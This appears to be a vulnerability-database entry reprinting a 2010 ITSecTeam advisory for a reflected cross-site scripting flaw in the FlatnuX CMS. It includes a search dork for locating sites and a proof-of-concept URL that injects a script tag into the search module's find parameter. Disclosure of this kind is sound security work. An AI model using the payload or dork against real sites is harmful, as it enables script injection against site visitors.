FlatnuX 2010-06.09 XSS

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050533 漏洞类型
发布时间 2010-07-02 更新时间 2010-07-02
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010070019
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
###############
#Title:             FlatnuX 2010-06.09 XSS                                 #
#Vendor:            http://www.flatnux.altervista.org/                     #
#Dork:              "Powered by  FlatNuX"                                  #
###############
#AUTHOR:            ITSecTeam                                              #
#Email:             Bug@ITSecTeam.com                                      #
#Website:           http://www.itsecteam.com                               #
#Forum :            http://forum.ITSecTeam.com                             #
#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability55.htm
#Thanks:            r3dm0v3,M3hr@n.S ,Pejvak,am!rkh@n
############################################################################

#DESCRIPTION (by vendor):###################################################
FlatNux is a CMS (Content Management System) that makes no use of DBMS,
but only text files (so its name).

#POC:#############
http://www.flatnux.altervista.org/index.php?mod=none_Search&find="><script>alert(1)</script>